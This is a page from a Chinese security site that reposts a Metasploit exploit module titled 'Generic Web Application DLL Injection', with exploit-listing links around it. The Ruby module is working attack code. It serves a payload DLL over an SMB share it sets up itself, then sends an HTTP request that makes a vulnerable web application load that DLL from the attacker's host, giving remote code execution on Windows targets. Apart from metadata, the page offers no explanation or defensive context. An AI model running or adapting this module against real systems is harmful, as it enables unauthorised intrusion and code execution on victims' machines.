首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Generic Web Application DLL Injection
来源:metasploit.com 作者:Hall 发布时间:2015-03-05   
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Generic Web Application DLL Injection',
      'Description'    => %q{
        This is a general-purpose module for exploiting conditions where a HTTP request
        triggers a DLL load from an specified SMB share. This module serves payloads as
        DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would
        trigger the load of the DLL.
      },
      'Author'         =>
        [
          'Matthew Hall <hallm[at]sec-1.com>'
        ],
      'Platform'       => 'win',
      'Privileged'     => false,
      'Arch'           => [ARCH_X86, ARCH_X86_64],
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'References'     =>
        [
          ['CWE', '427']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Targets'        =>
        [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
      'DefaultTarget'  => 0, # Default target is 32-bit as we usually inject into 32bit processes
      'DisclosureDate' => 'Mar 04 2015'
      ))

      register_options(
        [
          OptString.new('FILE_NAME', [false, 'DLL File name to share (Default: random .dll)']),
          OptString.new('TARGETURI', [true,  'Path to vulnerable URI (The shared location will be added at the end)', '/cgi-bin/function.php?argument=' ]),
          OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10])
        ], self.class)

      deregister_options('FILE_CONTENTS')
  end

  def setup
    super

    self.file_contents = generate_payload_dll
    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
    print_status("File available on #{unc}...")
  end

  def primer
    sploit = target_uri.to_s
    sploit << unc

    print_status("#{peer} - Trying to ")
    send_request_raw({
      'method' => 'GET',
      'uri' => sploit
    }, 3)
  end

  def exploit
    begin
      Timeout.timeout(datastore['SMB_DELAY']) {super}
    rescue Timeout::Error
      # do nothing... just finish exploit and stop smb server...
    end
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HP Data Protector 8.10 Remote
·Generic DLL Injection From Sha
·SQLite3 3.8.6 - Controlled Mem
·VFU 4.10-1.1 - Move Entry Buff
·Symantec Web Gateway 5 restore
·Wordpress Theme DesignFolio+ A
·Seagate Business NAS Unauthent
·PHPMoAdmin 1.1.2 Remote Code E
·Linux CVE-2014-9322 Proof Of C
·Nvidia Mental Ray Satellite Se
·Linux CVE-2014-4943 Proof Of C
·Betster 1.0.4 SQL Injection /
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved